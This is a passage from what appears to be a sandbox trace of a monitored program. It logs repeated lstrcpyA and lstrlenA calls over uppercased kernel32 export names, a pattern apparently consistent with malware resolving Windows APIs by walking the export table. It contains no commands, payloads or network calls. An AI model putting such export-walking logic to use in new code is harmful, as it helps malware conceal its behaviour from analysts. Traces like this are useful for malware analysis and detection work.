(lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0086.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0086.176] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0086.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0086.176] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0086.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0086.176] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0086.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0086.176] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0086.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0086.176] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0086.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0086.176] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0086.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0086.177] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0086.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0086.177] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0086.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0086.177] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0086.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0086.177] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0086.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0086.177] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0086.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0086.177] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0086.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0086.177] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0086.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0086.177] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0086.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0086.177] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0086.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0086.177] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0086.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0086.177] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0086.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0086.177] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0086.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0086.177] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0086.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0086.177] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0086.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0086.177] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0086.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0086.177] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0086.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0086.177] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0086.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0086.177] lstrlenA (lpString="BEEP") returned 4 [0086.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0086.178] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0086.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0086.178] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0086.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0086.178] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0086.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0086.178] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0086.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0086.178] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0086.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0086.178] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0086.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0086.178] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0086.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0086.178] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0086.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0086.178] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0086.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0086.178] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0086.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0086.178] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0086.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0086.178] lstrlenA (lpString="CANCELIO") returned 8 [0086.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0086.178] lstrlenA (lpString="CANCELIOEX") returned 10 [0086.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0086.178] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0086.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0086.178] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0086.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0086.178] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0086.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0086.178] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0086.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0086.178] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0086.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0086.178] lstrlenA (lpString="CHECKELEVATION") returned 14 [0086.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0086.179] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0086.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0086.179] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0086.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0086.179] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0086.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0086.179] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0086.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0086.179] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0086.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0086.179] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0086.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0086.179] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0086.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0086.179] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0086.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0086.179] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0086.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0086.179] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0086.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0086.179] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0086.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0086.179] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0086.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0086.179] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0086.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0086.179] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0086.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0086.179] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0086.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0086.179] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0086.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0086.179] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0086.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0086.179] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0086.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0086.180] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0086.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0086.180] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0086.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0086.180] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0086.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0086.180] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0086.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0086.180] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0086.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0086.180] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0086.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0086.180] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0086.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0086.180] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0086.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0086.180] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0086.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0086.180] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0086.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0086.180] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0086.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0086.180] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0086.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0086.180] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0086.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0086.180] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0086.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0086.180] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0086.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0086.180] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0086.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0086.180] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0086.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0086.180] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0086.180] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0086.180] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0086.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0086.181] lstrlenA (lpString="COPYCONTEXT") returned 11 [0086.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0086.181] lstrlenA (lpString="COPYFILEA") returned 9 [0086.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0086.181] lstrlenA (lpString="COPYFILEEXA") returned 11 [0086.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0086.181] lstrlenA (lpString="COPYFILEEXW") returned 11 [0086.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0086.181] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0086.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0086.181] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0086.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0086.181] lstrlenA (lpString="COPYFILEW") returned 9 [0086.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0086.181] lstrlenA (lpString="COPYLZFILE") returned 10 [0086.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0086.181] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0086.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0086.181] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0086.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0086.181] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0086.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0086.181] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0086.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0086.181] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0086.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0086.181] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0086.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0086.181] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0086.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0086.181] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0086.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0086.181] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0086.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0086.181] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0086.181] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0086.182] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0086.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0086.182] lstrlenA (lpString="CREATEEVENTA") returned 12 [0086.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0086.182] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0086.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0086.182] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0086.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0086.182] lstrlenA (lpString="CREATEEVENTW") returned 12 [0086.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0086.182] lstrlenA (lpString="CREATEFIBER") returned 11 [0086.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0086.182] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0086.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0086.182] lstrlenA (lpString="CREATEFILEA") returned 11 [0086.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0086.182] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0086.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0086.182] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0086.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0086.182] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0086.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0086.182] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0086.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0086.182] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0086.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0086.182] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0086.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0086.182] lstrlenA (lpString="CREATEFILEW") returned 11 [0086.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0086.182] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0086.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0086.182] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0086.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0086.182] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0086.182] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0086.182] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0086.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0086.183] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0086.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0086.183] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0086.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0086.183] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0086.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0086.183] lstrlenA (lpString="CREATEJOBSET") returned 12 [0086.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0086.183] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0086.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0086.183] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0086.183] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0086.183] lstrlenA 